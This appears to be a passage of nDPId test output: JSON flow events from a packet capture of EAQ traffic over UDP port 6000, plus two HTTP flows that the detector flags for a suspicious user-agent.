-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949806,"flow_last_seen":1432821014655,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821014655,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950935,"flow_last_seen":1432821015651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821015651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820951932,"flow_last_seen":1432821016651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821016651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820952931,"flow_last_seen":1432821017651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821017651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820953931,"flow_last_seen":1432821018651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821018651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820954931,"flow_last_seen":1432821019651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821019651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820955933,"flow_last_seen":1432821020651,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821020651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820956931,"flow_last_seen":1432821021652,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821021652,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957985,"flow_last_seen":1432821022695,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821022695,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959095,"flow_last_seen":1432821023795,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821023795,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821024791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821025791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821026791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821027791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821028791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821029791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821030791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821031791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820968101,"flow_last_seen":1432821032791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821032791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.67","src_port":60013,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821033791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820970111,"flow_last_seen":1432821034791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821034791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.67","src_port":40058,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820957985,"flow_last_seen":1432821044555,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820959035,"flow_last_seen":1432821045664,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949685,"flow_last_seen":1432821035985,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.185.125.226","src_port":48890,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820955933,"flow_last_seen":1432821042151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820950801,"flow_last_seen":1432821036105,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1432820948836,"flow_last_seen":1432820949347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2764,"flow_tot_l4_payload_len":9813,"flow_avg_l4_payload_len":700,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.24","src_port":40467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820950935,"flow_last_seen":1432821037152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820952931,"flow_last_seen":1432821039151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820958981,"flow_last_seen":1432821045604,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820951932,"flow_last_seen":1432821038152,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432820949735,"flow_last_seen":1432821036045,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1432820948562,"flow_last_seen":1432820948767,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":648,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.119.48","src_port":53497,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 
-00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820949806,"flow_last_seen":1432821036155,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820953931,"flow_last_seen":1432821040151,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":197,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432820969101,"flow_last_seen":1432821033791,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1432821045664,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.66","src_port":33356,"dst_port":6000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
